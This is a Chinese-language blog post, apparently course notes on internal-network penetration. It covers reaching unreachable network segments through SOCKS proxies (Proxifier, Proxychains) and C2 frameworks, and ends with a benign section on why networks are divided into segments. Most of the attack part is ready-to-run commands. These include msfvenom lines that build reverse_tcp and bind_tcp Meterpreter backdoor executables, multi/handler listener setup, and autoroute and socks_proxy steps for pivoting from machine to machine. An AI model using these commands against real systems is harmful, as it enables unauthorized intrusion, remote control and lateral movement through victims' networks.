内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

Ethan医生6个月前 (05-09)系统安全169

#代理技术-SockS配置-网络不可达-通讯解决

解决：信息收集打点和漏洞利用部分

注意：配置连接IP为C2服务器IP

工具：Proxifier Proxychains等

Proxifier使用：

直接看课程演示图形化操作

Proxychains使用：

加入修改配置： /etc/proxychains4.conf(在配置里面添加需要监听的SOCKS端口)

调用加载测试： proxychains4 curl http://192.168.2.22

C2平台：MSF/CS/Sliver/Viper等

实现步骤：

1、在被控机器上获取下一级网段

2、在被控及其上建立SockS节点

3、在工具上配置连接属性和规则触发

#代理技术-正反向监听-网络不可达-C2上线

C2平台：MSF/CS/Sliver/Viper等

实现步骤：

反向监听器：reverse

正向监听器：bind（需主动连接）

CS操作：

使用相同网段的进行反向绑定BIN进行通讯

C2服务器能够通信就能反向,跟出不出网没有关系

MSF操作命令：

配置反向上线：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地IP LPORT=3333 -f exe -o msf.exe

(意思是生成一个反向后门reverse_tcp )

use exploit/multi/handler

(查看配置指令:show options)

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 3333

run

查看路由表：

run autoroute -p

run post/multi/manage/autoroute (把所有路由LOAD出来)

创建socks节点：

auxiliary/server/socks_proxy

配置正向上线：

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost xx.xx.xx.xx

set lport 6666

run

-----------------------------------

获取到正向服务器继续内网渗透

查看sessions 2

重复使用auxiliary/server/socks_proxy 进行第3台内网机器

set srvport 8090端口地址

run

重复一直使用获取同网段机器

在内网中配置两个或多个网段通常基于以下核心目的和优势，具体原因及典型场景如下：

1. 网络隔离与安全性

隔离敏感数据：将不同安全级别的设备划分到不同网段（如财务部门、研发部门与普通办公网络隔离），限制跨网段访问，降低内部攻击或数据泄露风险。
防火墙策略：通过子网划分，可在网关或防火墙上设置精细的ACL（访问控制列表），仅允许特定流量跨网段通信（如仅允许IT管理网段访问服务器网段）。

2. 功能或业务划分

业务逻辑分离：例如：

服务器与客户端分离：服务器单独使用一个网段（如192.168.1.0/24），客户端使用另一个网段（如192.168.2.0/24），便于统一管理服务器资源。
IoT/设备专用网段：智能设备、摄像头等可能存在安全隐患的设备单独划分网段，避免影响主办公网络。

3. 性能优化与广播域控制

减少广播风暴：单个大型局域网中，广播流量（如ARP、DHCP）会泛洪到所有设备。划分多网段可缩小广播域，提升网络效率。
负载均衡：通过子网划分将流量分散到不同网段，避免单一网段拥塞（如视频会议流量与文件传输流量分离）。

4. IP地址管理（IPAM）

解决地址不足：单个网段的IP地址范围可能不足（如192.168.1.0/24仅支持254个主机），多网段可扩展地址池（如新增192.168.2.0/24）。
逻辑清晰：按部门/楼层划分网段（如10.0.1.0/24对应1楼，10.0.2.0/24对应2楼），便于故障排查和IP分配。